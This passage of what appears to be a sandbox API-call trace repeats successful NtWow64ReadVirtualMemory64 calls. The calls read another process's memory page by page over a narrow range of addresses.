ProcessHandle=0x1e4, BaseAddress=0x77f9f000, Buffer=0x7ff9, BufferSize=0x278f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.884] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa0000, Buffer=0x7ff9, BufferSize=0x2790000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.884] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa1000, Buffer=0x7ff9, BufferSize=0x2791000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.884] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa2000, Buffer=0x7ff9, BufferSize=0x2792000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.884] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa3000, Buffer=0x7ff9, BufferSize=0x2793000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.884] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa4000, Buffer=0x7ff9, BufferSize=0x2794000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.884] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa5000, Buffer=0x7ff9, BufferSize=0x2795000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.884] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa6000, Buffer=0x7ff9, BufferSize=0x2796000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.884] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa7000, Buffer=0x7ff9, BufferSize=0x2797000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.884] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa8000, Buffer=0x7ff9, BufferSize=0x2798000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.885] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa9000, Buffer=0x7ff9, BufferSize=0x2799000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.885] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77faa000, Buffer=0x7ff9, BufferSize=0x279a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.885] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fab000, Buffer=0x7ff9, BufferSize=0x279b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.885] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fac000, Buffer=0x7ff9, BufferSize=0x279c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.885] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fad000, Buffer=0x7ff9, BufferSize=0x279d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.885] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fae000, Buffer=0x7ff9, BufferSize=0x279e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.885] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77faf000, Buffer=0x7ff9, BufferSize=0x279f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.885] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb0000, Buffer=0x7ff9, BufferSize=0x27a0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.885] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb1000, Buffer=0x7ff9, BufferSize=0x27a1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.885] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb2000, Buffer=0x7ff9, BufferSize=0x27a2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.885] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb3000, Buffer=0x7ff9, BufferSize=0x27a3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.885] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb4000, Buffer=0x7ff9, BufferSize=0x27a4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.886] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb5000, Buffer=0x7ff9, BufferSize=0x27a5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.886] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb6000, Buffer=0x7ff9, BufferSize=0x27a6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.886] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb7000, Buffer=0x7ff9, BufferSize=0x27a7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.886] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb8000, Buffer=0x7ff9, BufferSize=0x27a8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.886] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb9000, Buffer=0x7ff9, BufferSize=0x27a9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.886] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fba000, Buffer=0x7ff9, BufferSize=0x27aa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.886] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fbb000, Buffer=0x7ff9, BufferSize=0x27ab000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.886] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fbc000, Buffer=0x7ff9, BufferSize=0x27ac000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.886] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fbd000, Buffer=0x7ff9, BufferSize=0x27ad000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.887] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fbe000, Buffer=0x7ff9, BufferSize=0x27ae000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.887] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fbf000, Buffer=0x7ff9, BufferSize=0x27af000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.887] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc0000, Buffer=0x7ff9, BufferSize=0x27b0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.887] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc1000, Buffer=0x7ff9, BufferSize=0x27b1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.887] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc2000, Buffer=0x7ff9, BufferSize=0x27b2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.887] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc3000, Buffer=0x7ff9, BufferSize=0x27b3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.887] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc4000, Buffer=0x7ff9, BufferSize=0x27b4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.887] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc5000, Buffer=0x7ff9, BufferSize=0x27b5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.888] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc6000, Buffer=0x7ff9, BufferSize=0x27b6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.888] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc7000, Buffer=0x7ff9, BufferSize=0x27b7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.888] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc8000, Buffer=0x7ff9, BufferSize=0x27b8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.888] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc9000, Buffer=0x7ff9, BufferSize=0x27b9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.888] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fca000, Buffer=0x7ff9, BufferSize=0x27ba000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.888] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fcb000, Buffer=0x7ff9, BufferSize=0x27bb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.889] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fcc000, Buffer=0x7ff9, BufferSize=0x27bc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.889] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fcd000, Buffer=0x7ff9, BufferSize=0x27bd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.889] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fce000, Buffer=0x7ff9, BufferSize=0x27be000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.889] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fcf000, Buffer=0x7ff9, BufferSize=0x27bf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.889] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd0000, Buffer=0x7ff9, BufferSize=0x27c0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.889] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd1000, Buffer=0x7ff9, BufferSize=0x27c1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.889] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd2000, Buffer=0x7ff9, BufferSize=0x27c2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.889] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd3000, Buffer=0x7ff9, BufferSize=0x27c3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.889] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd4000, Buffer=0x7ff9, BufferSize=0x27c4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.889] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd5000, Buffer=0x7ff9, BufferSize=0x27c5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.890] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd6000, Buffer=0x7ff9, BufferSize=0x27c6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.890] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd7000, Buffer=0x7ff9, BufferSize=0x27c7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.890] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd8000, Buffer=0x7ff9, BufferSize=0x27c8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.890] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd9000, Buffer=0x7ff9, BufferSize=0x27c9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.890] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fda000, Buffer=0x7ff9, BufferSize=0x27ca000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.890] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fdb000, Buffer=0x7ff9, BufferSize=0x27cb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.890] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fdc000, Buffer=0x7ff9, BufferSize=0x27cc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.890] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fdd000, Buffer=0x7ff9, BufferSize=0x27cd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.890] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fde000, Buffer=0x7ff9, BufferSize=0x27ce000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.890] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fdf000, Buffer=0x7ff9, BufferSize=0x27cf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.890] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe0000, Buffer=0x7ff9, BufferSize=0x27d0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.890] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe1000, Buffer=0x7ff9, BufferSize=0x27d1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.891] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe2000, Buffer=0x7ff9, BufferSize=0x27d2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.891] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe3000, Buffer=0x7ff9, BufferSize=0x27d3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.891] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe4000, Buffer=0x7ff9, BufferSize=0x27d4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.891] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe5000, Buffer=0x7ff9, BufferSize=0x27d5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.891] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe6000, Buffer=0x7ff9, BufferSize=0x27d6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.891] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe7000, Buffer=0x7ff9, BufferSize=0x27d7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.891] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe8000, Buffer=0x7ff9, BufferSize=0x27d8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.891] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe9000, Buffer=0x7ff9, BufferSize=0x27d9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.891] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fea000, Buffer=0x7ff9, BufferSize=0x27da000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.891] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77feb000, Buffer=0x7ff9, BufferSize=0x27db000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.891] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fec000, Buffer=0x7ff9, BufferSize=0x27dc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.892] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fed000, Buffer=0x7ff9, BufferSize=0x27dd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.892] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fee000, Buffer=0x7ff9, BufferSize=0x27de000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.892] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fef000, Buffer=0x7ff9, BufferSize=0x27df000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.892] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff0000, Buffer=0x7ff9, BufferSize=0x27e0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.892] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff1000, Buffer=0x7ff9, BufferSize=0x27e1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.892] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff2000, Buffer=0x7ff9, BufferSize=0x27e2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.892] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff3000, Buffer=0x7ff9, BufferSize=0x27e3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.892] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff4000, Buffer=0x7ff9, BufferSize=0x27e4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.892] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff5000, Buffer=0x7ff9, BufferSize=0x27e5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.892] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff6000, Buffer=0x7ff9, BufferSize=0x27e6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.893] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff7000, Buffer=0x7ff9, BufferSize=0x27e7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.893] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff8000, Buffer=0x7ff9, BufferSize=0x27e8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.893] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff9000, Buffer=0x7ff9, BufferSize=0x27e9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.893] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ffa000, Buffer=0x7ff9, BufferSize=0x27ea000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.893] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ffb000, Buffer=0x7ff9, BufferSize=0x27eb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.893] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ffc000, Buffer=0x7ff9, BufferSize=0x27ec000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.893] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ffd000, Buffer=0x7ff9, BufferSize=0x27ed000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.893] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ffe000, Buffer=0x7ff9, BufferSize=0x27ee000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.893] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fff000, Buffer=0x7ff9, BufferSize=0x27ef000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.893] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78000000, Buffer=0x7ff9, BufferSize=0x27f0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.893] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78001000, Buffer=0x7ff9, BufferSize=0x27f1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.894] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78002000, Buffer=0x7ff9, BufferSize=0x27f2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.894] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78003000, Buffer=0x7ff9, BufferSize=0x27f3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.894] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78004000, Buffer=0x7ff9, BufferSize=0x27f4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.894] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78005000, Buffer=0x7ff9, BufferSize=0x27f5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.894] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78006000, Buffer=0x7ff9, BufferSize=0x27f6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.894] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78007000, Buffer=0x7ff9, BufferSize=0x27f7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.894] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78008000, Buffer=0x7ff9, BufferSize=0x27f8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.894] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78009000, Buffer=0x7ff9, BufferSize=0x27f9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.894] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7800a000, Buffer=0x7ff9, BufferSize=0x27fa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.894] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7800b000, Buffer=0x7ff9, BufferSize=0x27fb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.894] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7800c000, Buffer=0x7ff9, BufferSize=0x27fc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.894] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7800d000, Buffer=0x7ff9, BufferSize=0x27fd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.895] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7800e000, Buffer=0x7ff9, BufferSize=0x27fe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.895] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7800f000, Buffer=0x7ff9, BufferSize=0x27ff000, 